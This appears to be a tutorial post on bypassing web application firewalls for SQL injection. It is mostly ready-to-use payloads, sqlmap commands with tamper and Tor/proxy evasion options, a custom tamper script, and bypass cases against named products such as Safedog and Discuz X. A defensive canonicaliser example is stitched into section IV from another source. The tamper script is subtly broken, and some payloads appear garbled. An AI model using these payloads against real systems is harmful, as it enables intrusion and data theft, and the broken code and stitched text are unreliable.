WAF Bypass | SQL Injection Methods Explained
Word count: 1576  2025-08-29 22:41:44
WAF Bypass and SQL Injection Methods Explained
I. Encoding-Based Bypass Techniques
1. URL encoding bypass
Single URL encoding:
- Convert special characters to % followed by their hexadecimal value
- Example: ?id=1%20union%20select%201 (%20 represents a space)
Double URL encoding:
- Targets WAFs that decode only once
- Example: ?id=1%2520union%2520select%25201 (%2520 decodes to %20, which then decodes to a space)
NULL byte truncation:
- Use %00 to truncate the WAF's parsing
- Example: ?id=1%00union%20select%201
SQLMap commands:
sqlmap -u "http://example.com/index.php?id=1" --tamper=percent
sqlmap -u "http://example.com/index.php?id=1" --tamper=url_double_encode
sqlmap -u "http://example.com/index.php?id=1" --hex
2. Unicode encoding bypass
Method:
- Replace key characters: ?id=un%u0069on%20select%201 (%u0069 represents "i")
- Mixed encoding: ?id=sel%u0065ct%20f%u0072om%20users
SQLMap command:
sqlmap -u "http://example.com/index.php?id=1" --tamper=charunicodeencode
3. Hex/ASCII encoding bypass
Hexadecimal representation:
- MSSQL example: ?id=1;exec(0x730065006c00650063007400200075007300650072) (the hex encoding of "select user")
Character concatenation:
- MySQL example: ?id=1+union+select+CONCAT(0x7e,version())
II. Protocol and Request-Feature Bypass
1. HTTP parameter pollution
Same-name parameter override:
?id=1&id=union+select+1,2,3
Parameter splitting:
?id=1+union&id=select&id=1+from+admin
2. Request method spoofing
GET converted to POST:
POST /index.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

id=1+union+select+1,2,3
Unconventional methods:
HEAD /?id=1+union+select+1 HTTP/1.1
Host: example.com
SQLMap commands:
sqlmap -u "http://example.com/index.php" --method=POST --data="id=1"
sqlmap -u "http://example.com/index.php?id=1" --force-ssl
III. Database-Feature Bypass
1. MySQL bypass techniques
Loose whitespace:
- Use + or /**/ in place of spaces
- Example: ?id=1+union/**/select/**/1
Inline execution:
- Example: ?id=1+/*!50001union*/+/*!50001select*/database()
SQLMap command:
sqlmap -u "http://example.com/index.php?id=1" --tamper=space2plus --dbms=mysql
2. MSSQL bypass techniques
HEX encoding:
- Example: ?id=1;exec(0x770061006900740066006f0072002000640065006c0061007900)
Variable declaration:
- Example: ?id=1;declare @a varchar(50);set @a='sel'+'ect user';exec(@a)
SQLMap command:
sqlmap -u "http://example.com/index.php?id=1" --dbms=mssql --hex
IV. Rule and Policy Bypass
1. Keyword splitting and substitution
Double-writing bypass:
?id=1+ununionion+selselectect+1
Symbol substitution:
?id=1||1=1 (|| in place of OR)
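Every technique in sections I to IV works because the WAF matches its rules before it has undone the transformations the backend will undo. The following is an added example, not code from the original post: a request canonicaliser assumed to sit in front of the application, which decodes to a bounded fixed point, neutralises NULL bytes and MySQL comments, and treats repeated parameters as one string before applying a deliberately simple, hypothetical "union ... select" rule. All query strings in it are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Hypothetical rule: "union" followed within 40 characters by "select".
# No \b anchors on purpose: a doubled keyword ("ununionion") still contains
# the plain substring, and a detector should block, not strip and forward.
_RULE = re.compile(r"union.{0,40}select", re.IGNORECASE | re.DOTALL)
_UNICODE_ESC = re.compile(r"%u([0-9a-fA-F]{4})")
# MySQL executes versioned comments (/*!50001 ... */), so only their
# delimiters are dropped; ordinary /* ... */ comments are removed whole.
_COMMENT = re.compile(r"/\*!\d*|\*/|/\*.*?\*/", re.DOTALL)


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Decode to a fixed point (bounded), then remove parser noise.
    This deliberately over-decodes (a literal %2B becomes a space), which is
    fine for matching but must never be what the application receives.
    """
    for _ in range(max_rounds):
        decoded = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), value)
        decoded = unquote(decoded.replace("+", " "))
        if decoded == value:
            break
        value = decoded
    value = value.replace("\x00", " ")  # a NULL byte must not end the scan
    value = _COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()


def inspect_query(query: str) -> list:
    """Return (name, canonical value) for each value that matches the rule.
    parse_qs keeps every value of a repeated name; the comma-joined form
    mirrors backends that concatenate duplicates, so a payload split across
    repeated parameters is still seen as one string.
    """
    hits = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        candidates = list(values)
        if len(values) > 1:
            candidates.append(",".join(values))
        for raw in candidates:
            canon = canonicalize(raw)
            if _RULE.search(canon):
                hits.append((name, canon))
    return hits


if __name__ == "__main__":
    # Constructed query strings mirroring the evasions listed above.
    for q in ("id=1%2520union%2520select%25201", "id=un%u0069on%20select%201",
              "id=1+union&id=select&id=1+from+admin", "id=42&q=reunion+tickets"):
        print(q, "->", inspect_query(q))
```

The rule itself is a toy; the point is that matching happens only after canonicalisation, and that a miss should block the request rather than hand a sanitised copy onward.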
2. Whitelist and rate-limit bypass
Spoofed User-Agent:
GET /?id=1+union+select+1 HTTP/1.1
Host: example.com
User-Agent: Baiduspider
Low-frequency requests:
- Use Burp Intruder with multiple proxy IPs in rotation
SQLMap command:
sqlmap -u "http://example.com/index.php?id=1" --random-agent --tor --proxy=http://127.0.0.1:8080
V. Advanced SQLMap Bypass Combinations
Common combined commands:
sqlmap -u "http://example.com/index.php?id=1" --dbs --random-agent --tamper=between,charunicodeencode,percent
sqlmap -u "http://example.com/index.php" --data="id=1" --method=POST --dbs --tamper=space2comment
sqlmap -u "http://example.com/index.php?id=1" --dbs --level=5 --risk=3 --random-agent --hex --tamper=between,space2comment
VI. Multi-Function SQLMap Tamper Script
Script features:
- Double URL encoding (%20 → %2520)
- Spaces replaced with +
- = replaced with LIKE
- Random case for SQL keywords
- Comment obfuscation of SQL keywords (SELECT → /**/SELECT/**/)
- Hexadecimal encoding
- Keyword double-writing (SELECT → SELECTSELECT)
- Newline in place of URL spaces (+ replaced with %0A)
Script code:
import binascii
import random
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def tamper(payload, **kwargs):
    if not payload:
        return payload
    # 1. Double URL encoding
    payload = payload.replace(" ", "%20").replace("%", "%25")
    # 2. Replace spaces with `+`
    payload = payload.replace("%20", "+")
    # 3. Replace `=` with `LIKE`
    payload = payload.replace("=", " LIKE ")
    # 4. SQL keyword case obfuscation (random case)
    new_payload = ""
    for char in payload:
        if char.isalpha() and random.choice([True, False]):
            new_payload += char.upper()
        else:
            new_payload += char.lower()
    payload = new_payload
    # 5. SQL keyword comment obfuscation
    keywords = ["SELECT", "UNION", "FROM", "WHERE", "INSERT", "UPDATE", "DELETE"]
    for keyword in keywords:
        payload = payload.replace(keyword, f"/**/{keyword}/**/")
    # 6. Hexadecimal encoding
    hex_payload = "0x" + binascii.hexlify(payload.encode()).decode()
    payload = hex_payload
    # 7. Keyword double-writing
    for keyword in keywords:
        payload = payload.replace(keyword, keyword * 2)
    # 8. Newline in place of URL spaces
    payload = payload.replace("+", "%0A")
    return payload
Usage:
sqlmap -u "http://example.com/index.php?id=1" --tamper=combined_bypass
VII. Practical Cases
- Safedog (安全狗) bypass:
  - %00 truncation: ?id=1%00union%20select%201
  - Logic obfuscation: ?id=1+a%n%d+1=1
- Discuz X bypass:
  - Backtick bypass: ?id=@'\union\select\1\from\admin
- IIS bypass:
  - Character encoding obfuscation: ?id=SEL%E%CT%201+FROM%20users